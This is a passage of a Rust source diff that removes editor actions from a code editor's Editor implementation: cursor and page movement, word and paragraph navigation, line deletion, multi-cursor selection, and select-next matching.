cx.propagate(); - return; - } - - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - - let text_layout_details = &self.text_layout_details(window); - let selection_count = self.selections.count(); - let first_selection = self.selections.first_anchor(); - - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - if !selection.is_empty() { - selection.goal = SelectionGoal::None; - } - let (cursor, goal) = movement::down( - map, - selection.end, - selection.goal, - false, - text_layout_details, - ); - selection.collapse_to(cursor, goal); - }); - }); - - if selection_count == 1 && first_selection.range() == self.selections.first_anchor().range() - { - cx.propagate(); - } - } - - pub fn select_page_down( - &mut self, - _: &SelectPageDown, - window: &mut Window, - cx: &mut Context, - ) { - let Some(row_count) = self.visible_row_count() else { - return; - }; - - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - - let text_layout_details = &self.text_layout_details(window); - - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, goal| { - movement::down_by_rows(map, head, row_count, goal, false, text_layout_details) - }) - }) - } - - pub fn move_page_down( - &mut self, - action: &MovePageDown, - window: &mut Window, - cx: &mut Context, - ) { - if self.take_rename(true, window, cx).is_some() { - return; - } - - if self - .context_menu - .borrow_mut() - .as_mut() - .map(|menu| menu.select_last(self.completion_provider.as_deref(), cx)) - .unwrap_or(false) - { - return; - } - - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - - let Some(row_count) = self.visible_row_count() else { - return; - }; - - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - - let autoscroll = if action.center_cursor { - Autoscroll::center() - } else { - Autoscroll::fit() - }; - - let text_layout_details = &self.text_layout_details(window); - self.change_selections(Some(autoscroll), window, cx, |s| { - s.move_with(|map, selection| { - if !selection.is_empty() { - selection.goal = SelectionGoal::None; - } - let (cursor, goal) = movement::down_by_rows( - map, - selection.end, - row_count, - selection.goal, - false, - text_layout_details, - ); - selection.collapse_to(cursor, goal); - }); - }); - } - - pub fn select_down(&mut self, _: &SelectDown, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - let text_layout_details = &self.text_layout_details(window); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, goal| { - movement::down(map, head, goal, false, text_layout_details) - }) - }); - } - - pub fn context_menu_first( - &mut self, - _: &ContextMenuFirst, - _window: &mut Window, - cx: &mut Context, - ) { - if let Some(context_menu) = self.context_menu.borrow_mut().as_mut() { - context_menu.select_first(self.completion_provider.as_deref(), cx); - } - } - - pub fn context_menu_prev( - &mut self, - _: &ContextMenuPrevious, - _window: &mut Window, - cx: &mut Context, - ) { - if let Some(context_menu) = self.context_menu.borrow_mut().as_mut() { - context_menu.select_prev(self.completion_provider.as_deref(), cx); - } - } - - pub fn context_menu_next( - &mut self, - _: &ContextMenuNext, - _window: &mut Window, - cx: &mut Context, - ) { - if let Some(context_menu) = self.context_menu.borrow_mut().as_mut() { - context_menu.select_next(self.completion_provider.as_deref(), cx); - } - } - - pub fn context_menu_last( - &mut self, - _: &ContextMenuLast, - _window: &mut Window, - cx: &mut Context, - ) { - if let Some(context_menu) = self.context_menu.borrow_mut().as_mut() { - context_menu.select_last(self.completion_provider.as_deref(), cx); - } - } - - pub fn move_to_previous_word_start( - &mut self, - _: &MoveToPreviousWordStart, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_cursors_with(|map, head, _| { - ( - movement::previous_word_start(map, head), - SelectionGoal::None, - ) - }); - }) - } - - pub fn move_to_previous_subword_start( - &mut self, - _: &MoveToPreviousSubwordStart, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_cursors_with(|map, head, _| { - ( - movement::previous_subword_start(map, head), - SelectionGoal::None, - ) - }); - }) - } - - pub fn select_to_previous_word_start( - &mut self, - _: &SelectToPreviousWordStart, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, _| { - ( - movement::previous_word_start(map, head), - SelectionGoal::None, - ) - }); - }) - } - - pub fn select_to_previous_subword_start( - &mut self, - _: &SelectToPreviousSubwordStart, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, _| { - ( - movement::previous_subword_start(map, head), - SelectionGoal::None, - ) - }); - }) - } - - pub fn delete_to_previous_word_start( - &mut self, - action: &DeleteToPreviousWordStart, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.transact(window, cx, |this, window, cx| { - this.select_autoclose_pair(window, cx); - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - if selection.is_empty() { - let cursor = if action.ignore_newlines { - movement::previous_word_start(map, selection.head()) - } else { - movement::previous_word_start_or_newline(map, selection.head()) - }; - selection.set_head(cursor, SelectionGoal::None); - } - }); - }); - this.insert("", window, cx); - }); - } - - pub fn delete_to_previous_subword_start( - &mut self, - _: &DeleteToPreviousSubwordStart, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.transact(window, cx, |this, window, cx| { - this.select_autoclose_pair(window, cx); - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - if selection.is_empty() { - let cursor = movement::previous_subword_start(map, selection.head()); - selection.set_head(cursor, SelectionGoal::None); - } - }); - }); - this.insert("", window, cx); - }); - } - - pub fn move_to_next_word_end( - &mut self, - _: &MoveToNextWordEnd, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_cursors_with(|map, head, _| { - (movement::next_word_end(map, head), SelectionGoal::None) - }); - }) - } - - pub fn move_to_next_subword_end( - &mut self, - _: &MoveToNextSubwordEnd, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_cursors_with(|map, head, _| { - (movement::next_subword_end(map, head), SelectionGoal::None) - }); - }) - } - - pub fn select_to_next_word_end( - &mut self, - _: &SelectToNextWordEnd, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, _| { - (movement::next_word_end(map, head), SelectionGoal::None) - }); - }) - } - - pub fn select_to_next_subword_end( - &mut self, - _: &SelectToNextSubwordEnd, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, _| { - (movement::next_subword_end(map, head), SelectionGoal::None) - }); - }) - } - - pub fn delete_to_next_word_end( - &mut self, - action: &DeleteToNextWordEnd, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.transact(window, cx, |this, window, cx| { - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - if selection.is_empty() { - let cursor = if action.ignore_newlines { - movement::next_word_end(map, selection.head()) - } else { - movement::next_word_end_or_newline(map, selection.head()) - }; - selection.set_head(cursor, SelectionGoal::None); - } - }); - }); - this.insert("", window, cx); - }); - } - - pub fn delete_to_next_subword_end( - &mut self, - _: &DeleteToNextSubwordEnd, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.transact(window, cx, |this, window, cx| { - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - if selection.is_empty() { - let cursor = movement::next_subword_end(map, selection.head()); - selection.set_head(cursor, SelectionGoal::None); - } - }); - }); - this.insert("", window, cx); - }); - } - - pub fn move_to_beginning_of_line( - &mut self, - action: &MoveToBeginningOfLine, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_cursors_with(|map, head, _| { - ( - movement::indented_line_beginning( - map, - head, - action.stop_at_soft_wraps, - action.stop_at_indent, - ), - SelectionGoal::None, - ) - }); - }) - } - - pub fn select_to_beginning_of_line( - &mut self, - action: &SelectToBeginningOfLine, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, _| { - ( - movement::indented_line_beginning( - map, - head, - action.stop_at_soft_wraps, - action.stop_at_indent, - ), - SelectionGoal::None, - ) - }); - }); - } - - pub fn delete_to_beginning_of_line( - &mut self, - action: &DeleteToBeginningOfLine, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.transact(window, cx, |this, window, cx| { - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|_, selection| { - selection.reversed = true; - }); - }); - - this.select_to_beginning_of_line( - &SelectToBeginningOfLine { - stop_at_soft_wraps: false, - stop_at_indent: action.stop_at_indent, - }, - window, - cx, - ); - this.backspace(&Backspace, window, cx); - }); - } - - pub fn move_to_end_of_line( - &mut self, - action: &MoveToEndOfLine, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_cursors_with(|map, head, _| { - ( - movement::line_end(map, head, action.stop_at_soft_wraps), - SelectionGoal::None, - ) - }); - }) - } - - pub fn select_to_end_of_line( - &mut self, - action: &SelectToEndOfLine, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, _| { - ( - movement::line_end(map, head, action.stop_at_soft_wraps), - SelectionGoal::None, - ) - }); - }) - } - - pub fn delete_to_end_of_line( - &mut self, - _: &DeleteToEndOfLine, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.transact(window, cx, |this, window, cx| { - this.select_to_end_of_line( - &SelectToEndOfLine { - stop_at_soft_wraps: false, - }, - window, - cx, - ); - this.delete(&Delete, window, cx); - }); - } - - pub fn cut_to_end_of_line( - &mut self, - _: &CutToEndOfLine, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.transact(window, cx, |this, window, cx| { - this.select_to_end_of_line( - &SelectToEndOfLine { - stop_at_soft_wraps: false, - }, - window, - cx, - ); - this.cut(&Cut, window, cx); - }); - } - - pub fn move_to_start_of_paragraph( - &mut self, - _: &MoveToStartOfParagraph, - window: &mut Window, - cx: &mut Context, - ) { - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - selection.collapse_to( - movement::start_of_paragraph(map, selection.head(), 1), - SelectionGoal::None, - ) - }); - }) - } - - pub fn move_to_end_of_paragraph( - &mut self, - _: &MoveToEndOfParagraph, - window: &mut Window, - cx: &mut Context, - ) { - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - selection.collapse_to( - movement::end_of_paragraph(map, selection.head(), 1), - SelectionGoal::None, - ) - }); - }) - } - - pub fn select_to_start_of_paragraph( - &mut self, - _: &SelectToStartOfParagraph, - window: &mut Window, - cx: &mut Context, - ) { - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, _| { - ( - movement::start_of_paragraph(map, head, 1), - SelectionGoal::None, - ) - }); - }) - } - - pub fn select_to_end_of_paragraph( - &mut self, - _: &SelectToEndOfParagraph, - window: &mut Window, - cx: &mut Context, - ) { - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, _| { - ( - movement::end_of_paragraph(map, head, 1), - SelectionGoal::None, - ) - }); - }) - } - - pub fn move_to_start_of_excerpt( - &mut self, - _: &MoveToStartOfExcerpt, - window: &mut Window, - cx: &mut Context, - ) { - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - selection.collapse_to( - movement::start_of_excerpt( - map, - selection.head(), - workspace::searchable::Direction::Prev, - ), - SelectionGoal::None, - ) - }); - }) - } - - pub fn move_to_start_of_next_excerpt( - &mut self, - _: &MoveToStartOfNextExcerpt, - window: &mut Window, - cx: &mut Context, - ) { - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - selection.collapse_to( - movement::start_of_excerpt( - map, - selection.head(), - workspace::searchable::Direction::Next, - ), - SelectionGoal::None, - ) - }); - }) - } - - pub fn move_to_end_of_excerpt( - &mut self, - _: &MoveToEndOfExcerpt, - window: &mut Window, - cx: &mut Context, - ) { - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - selection.collapse_to( - movement::end_of_excerpt( - map, - selection.head(), - workspace::searchable::Direction::Next, - ), - SelectionGoal::None, - ) - }); - }) - } - - pub fn move_to_end_of_previous_excerpt( - &mut self, - _: &MoveToEndOfPreviousExcerpt, - window: &mut Window, - cx: &mut Context, - ) { - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - selection.collapse_to( - movement::end_of_excerpt( - map, - selection.head(), - workspace::searchable::Direction::Prev, - ), - SelectionGoal::None, - ) - }); - }) - } - - pub fn select_to_start_of_excerpt( - &mut self, - _: &SelectToStartOfExcerpt, - window: &mut Window, - cx: &mut Context, - ) { - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, _| { - ( - movement::start_of_excerpt(map, head, workspace::searchable::Direction::Prev), - SelectionGoal::None, - ) - }); - }) - } - - pub fn select_to_start_of_next_excerpt( - &mut self, - _: &SelectToStartOfNextExcerpt, - window: &mut Window, - cx: &mut Context, - ) { - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, _| { - ( - movement::start_of_excerpt(map, head, workspace::searchable::Direction::Next), - SelectionGoal::None, - ) - }); - }) - } - - pub fn select_to_end_of_excerpt( - &mut self, - _: &SelectToEndOfExcerpt, - window: &mut Window, - cx: &mut Context, - ) { - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, _| { - ( - movement::end_of_excerpt(map, head, workspace::searchable::Direction::Next), - SelectionGoal::None, - ) - }); - }) - } - - pub fn select_to_end_of_previous_excerpt( - &mut self, - _: &SelectToEndOfPreviousExcerpt, - window: &mut Window, - cx: &mut Context, - ) { - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, _| { - ( - movement::end_of_excerpt(map, head, workspace::searchable::Direction::Prev), - SelectionGoal::None, - ) - }); - }) - } - - pub fn move_to_beginning( - &mut self, - _: &MoveToBeginning, - window: &mut Window, - cx: &mut Context, - ) { - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select_ranges(vec![0..0]); - }); - } - - pub fn select_to_beginning( - &mut self, - _: &SelectToBeginning, - window: &mut Window, - cx: &mut Context, - ) { - let mut selection = self.selections.last::(cx); - selection.set_head(Point::zero(), SelectionGoal::None); - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(vec![selection]); - }); - } - - pub fn move_to_end(&mut self, _: &MoveToEnd, window: &mut Window, cx: &mut Context) { - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - let cursor = self.buffer.read(cx).read(cx).len(); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select_ranges(vec![cursor..cursor]) - }); - } - - pub fn set_nav_history(&mut self, nav_history: Option) { - self.nav_history = nav_history; - } - - pub fn nav_history(&self) -> Option<&ItemNavHistory> { - self.nav_history.as_ref() - } - - pub fn create_nav_history_entry(&mut self, cx: &mut Context) { - self.push_to_nav_history(self.selections.newest_anchor().head(), None, false, cx); - } - - fn push_to_nav_history( - &mut self, - cursor_anchor: Anchor, - new_position: Option, - is_deactivate: bool, - cx: &mut Context, - ) { - if let Some(nav_history) = self.nav_history.as_mut() { - let buffer = self.buffer.read(cx).read(cx); - let cursor_position = cursor_anchor.to_point(&buffer); - let scroll_state = self.scroll_manager.anchor(); - let scroll_top_row = scroll_state.top_row(&buffer); - drop(buffer); - - if let Some(new_position) = new_position { - let row_delta = (new_position.row as i64 - cursor_position.row as i64).abs(); - if row_delta < MIN_NAVIGATION_HISTORY_ROW_DELTA { - return; - } - } - - nav_history.push( - Some(NavigationData { - cursor_anchor, - cursor_position, - scroll_anchor: scroll_state, - scroll_top_row, - }), - Some(cursor_position.row), - cx, - ); - cx.emit(EditorEvent::PushedToNavHistory { - anchor: cursor_anchor, - is_deactivate, - }) - } - } - - pub fn select_to_end(&mut self, _: &SelectToEnd, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - let buffer = self.buffer.read(cx).snapshot(cx); - let mut selection = self.selections.first::(cx); - selection.set_head(buffer.len(), SelectionGoal::None); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(vec![selection]); - }); - } - - pub fn select_all(&mut self, _: &SelectAll, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - let end = self.buffer.read(cx).read(cx).len(); - self.change_selections(None, window, cx, |s| { - s.select_ranges(vec![0..end]); - }); - } - - pub fn select_line(&mut self, _: &SelectLine, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let mut selections = self.selections.all::(cx); - let max_point = display_map.buffer_snapshot.max_point(); - for selection in &mut selections { - let rows = selection.spanned_rows(true, &display_map); - selection.start = Point::new(rows.start.0, 0); - selection.end = cmp::min(max_point, Point::new(rows.end.0, 0)); - selection.reversed = false; - } - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(selections); - }); - } - - pub fn split_selection_into_lines( - &mut self, - _: &SplitSelectionIntoLines, - window: &mut Window, - cx: &mut Context, - ) { - let selections = self - .selections - .all::(cx) - .into_iter() - .map(|selection| selection.start..selection.end) - .collect::>(); - self.unfold_ranges(&selections, true, true, cx); - - let mut new_selection_ranges = Vec::new(); - { - let buffer = self.buffer.read(cx).read(cx); - for selection in selections { - for row in selection.start.row..selection.end.row { - let cursor = Point::new(row, buffer.line_len(MultiBufferRow(row))); - new_selection_ranges.push(cursor..cursor); - } - - let is_multiline_selection = selection.start.row != selection.end.row; - // Don't insert last one if it's a multi-line selection ending at the start of a line, - // so this action feels more ergonomic when paired with other selection operations - let should_skip_last = is_multiline_selection && selection.end.column == 0; - if !should_skip_last { - new_selection_ranges.push(selection.end..selection.end); - } - } - } - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select_ranges(new_selection_ranges); - }); - } - - pub fn add_selection_above( - &mut self, - _: &AddSelectionAbove, - window: &mut Window, - cx: &mut Context, - ) { - self.add_selection(true, window, cx); - } - - pub fn add_selection_below( - &mut self, - _: &AddSelectionBelow, - window: &mut Window, - cx: &mut Context, - ) { - self.add_selection(false, window, cx); - } - - fn add_selection(&mut self, above: bool, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let mut selections = self.selections.all::(cx); - let text_layout_details = self.text_layout_details(window); - let mut state = self.add_selections_state.take().unwrap_or_else(|| { - let oldest_selection = selections.iter().min_by_key(|s| s.id).unwrap().clone(); - let range = oldest_selection.display_range(&display_map).sorted(); - - let start_x = display_map.x_for_display_point(range.start, &text_layout_details); - let end_x = display_map.x_for_display_point(range.end, &text_layout_details); - let positions = start_x.min(end_x)..start_x.max(end_x); - - selections.clear(); - let mut stack = Vec::new(); - for row in range.start.row().0..=range.end.row().0 { - if let Some(selection) = self.selections.build_columnar_selection( - &display_map, - DisplayRow(row), - &positions, - oldest_selection.reversed, - &text_layout_details, - ) { - stack.push(selection.id); - selections.push(selection); - } - } - - if above { - stack.reverse(); - } - - AddSelectionsState { above, stack } - }); - - let last_added_selection = *state.stack.last().unwrap(); - let mut new_selections = Vec::new(); - if above == state.above { - let end_row = if above { - DisplayRow(0) - } else { - display_map.max_point().row() - }; - - 'outer: for selection in selections { - if selection.id == last_added_selection { - let range = selection.display_range(&display_map).sorted(); - debug_assert_eq!(range.start.row(), range.end.row()); - let mut row = range.start.row(); - let positions = - if let SelectionGoal::HorizontalRange { start, end } = selection.goal { - px(start)..px(end) - } else { - let start_x = - display_map.x_for_display_point(range.start, &text_layout_details); - let end_x = - display_map.x_for_display_point(range.end, &text_layout_details); - start_x.min(end_x)..start_x.max(end_x) - }; - - while row != end_row { - if above { - row.0 -= 1; - } else { - row.0 += 1; - } - - if let Some(new_selection) = self.selections.build_columnar_selection( - &display_map, - row, - &positions, - selection.reversed, - &text_layout_details, - ) { - state.stack.push(new_selection.id); - if above { - new_selections.push(new_selection); - new_selections.push(selection); - } else { - new_selections.push(selection); - new_selections.push(new_selection); - } - - continue 'outer; - } - } - } - - new_selections.push(selection); - } - } else { - new_selections = selections; - new_selections.retain(|s| s.id != last_added_selection); - state.stack.pop(); - } - - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(new_selections); - }); - if state.stack.len() > 1 { - self.add_selections_state = Some(state); - } - } - - pub fn select_next_match_internal( - &mut self, - display_map: &DisplaySnapshot, - replace_newest: bool, - autoscroll: Option, - window: &mut Window, - cx: &mut Context, - ) -> Result<()> { - fn select_next_match_ranges( - this: &mut Editor, - range: Range, - reversed: bool, - replace_newest: bool, - auto_scroll: Option, - window: &mut Window, - cx: &mut Context, - ) { - this.unfold_ranges(&[range.clone()], false, auto_scroll.is_some(), cx); - this.change_selections(auto_scroll, window, cx, |s| { - if replace_newest { - s.delete(s.newest_anchor().id); - } - if reversed { - s.insert_range(range.end..range.start); - } else { - s.insert_range(range); - } - }); - } - - let buffer = &display_map.buffer_snapshot; - let mut selections = self.selections.all::(cx); - if let Some(mut select_next_state) = self.select_next_state.take() { - let query = &select_next_state.query; - if !select_next_state.done { - let first_selection = selections.iter().min_by_key(|s| s.id).unwrap(); - let last_selection = selections.iter().max_by_key(|s| s.id).unwrap(); - let mut next_selected_range = None; - - let bytes_after_last_selection = - buffer.bytes_in_range(last_selection.end..buffer.len()); - let bytes_before_first_selection = buffer.bytes_in_range(0..first_selection.start); - let query_matches = query - .stream_find_iter(bytes_after_last_selection) - .map(|result| (last_selection.end, result)) - .chain( - query - .stream_find_iter(bytes_before_first_selection) - .map(|result| (0, result)), - ); - - for (start_offset, query_match) in query_matches { - let query_match = query_match.unwrap(); // can only fail due to I/O - let offset_range = - start_offset + query_match.start()..start_offset + query_match.end(); - let display_range = offset_range.start.to_display_point(display_map) - ..offset_range.end.to_display_point(display_map); - - if !select_next_state.wordwise - || (!movement::is_inside_word(display_map, display_range.start) - && !movement::is_inside_word(display_map, display_range.end)) - { - // TODO: This is n^2, because we might check all the selections - if !selections - .iter() - .any(|selection| selection.range().overlaps(&offset_range)) - { - next_selected_range = Some(offset_range); - break; - } - } - } - - if let Some(next_selected_range) = next_selected_range { - select_next_match_ranges( - self, - next_selected_range, - last_selection.reversed, - replace_newest, - autoscroll, - window, - cx, - ); - } else { - select_next_state.done = true; - } - } - - self.select_next_state = Some(select_next_state); - } else { - let mut only_carets = true; - let mut same_text_selected = true; - let mut selected_text = None; - - let mut selections_iter = selections.iter().peekable(); - while let Some(selection) = selections_iter.next() { - if selection.start != selection.end { - only_carets = false; - } - - if same_text_selected { - if selected_text.is_none() { - selected_text = - Some(buffer.text_for_range(selection.range()).collect::()); - } - - if let Some(next_selection) = selections_iter.peek() { - if next_selection.range().len() == selection.range().len() { - let next_selected_text = buffer - .text_for_range(next_selection.range()) - .collect::(); - if Some(next_selected_text) != selected_text { - same_text_selected = false; - selected_text = None; - } - } else { - same_text_selected = false; - selected_text = None; - } - } - } - } - - if only_carets { - for selection in &mut selections { - let word_range = movement::surrounding_word( - display_map, - selection.start.to_display_point(display_map), - ); - selection.start = word_range.start.to_offset(display_map, Bias::Left); - selection.end = word_range.end.to_offset(display_map, Bias::Left); - selection.goal = SelectionGoal::None; - selection.reversed = false; - select_next_match_ranges( - self, - selection.start..selection.end, - selection.reversed, - replace_newest, - autoscroll, - window, - cx, - ); - } - - if selections.len() == 1 { - let selection = selections - .last() - .expect("ensured that there's only one selection"); - let query = buffer - .text_for_range(selection.start..selection.end) - .collect::(); - let is_empty = query.is_empty(); - let select_state = SelectNextState { - query: AhoCorasick::new(&[query])?, - wordwise: true, - done: is_empty, - }; - self.select_next_state = Some(select_state); - } else { - self.select_next_state = None; - } - } else if let Some(selected_text) = selected_text { - self.select_next_state = Some(SelectNextState { - query: AhoCorasick::new(&[selected_text])?, - wordwise: false, - done: false, - }); - self.select_next_match_internal( - display_map, - replace_newest, - autoscroll, - window, - cx, - )?; - } - } - Ok(()) - } - - pub fn select_all_matches( - &mut self, - _action: &SelectAllMatches, - window: &mut Window, - cx: &mut Context, - ) -> Result<()> { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - - self.push_to_selection_history(); - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - - self.select_next_match_internal(&display_map, false, None, window, cx)?; - let Some(select_next_state) = self.select_next_state.as_mut() else { - return Ok(()); - }; - if select_next_state.done { - return Ok(()); - } - - let mut new_selections = Vec::new(); - - let reversed = self.selections.oldest::(cx).reversed; - let buffer = &display_map.buffer_snapshot; - let query_matches = select_next_state - .query - .stream_find_iter(buffer.bytes_in_range(0..buffer.len())); - - for query_match in query_matches.into_iter() { - let query_match = query_match.context("query match for select all action")?; // can only fail due to I/O - let offset_range = if reversed { - query_match.end()..query_match.start() - } else { - query_match.start()..query_match.end() - }; - let display_range = offset_range.start.to_display_point(&display_map) - ..offset_range.end.to_display_point(&display_map); - - if !select_next_state.wordwise - || (!movement::is_inside_word(&display_map, display_range.start) - && !movement::is_inside_word(&display_map, display_range.end)) - { - new_selections.push(offset_range.start..offset_range.end); - } - } - - select_next_state.done = true; - self.unfold_ranges(&new_selections.clone(), false, false, cx); - self.change_selections(None, window, cx, |selections| { - selections.select_ranges(new_selections) - }); - - Ok(()) - } - - pub fn select_next( - &mut self, - action: &SelectNext, - window: &mut Window, - cx: &mut Context, - ) -> Result<()> { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.push_to_selection_history(); - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - self.select_next_match_internal( - &display_map, - action.replace_newest, - Some(Autoscroll::newest()), - window, - cx, - )?; - Ok(()) - } - - pub fn select_previous( - &mut self, - action: &SelectPrevious, - window: &mut Window, - cx: &mut Context, - ) -> Result<()> { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - 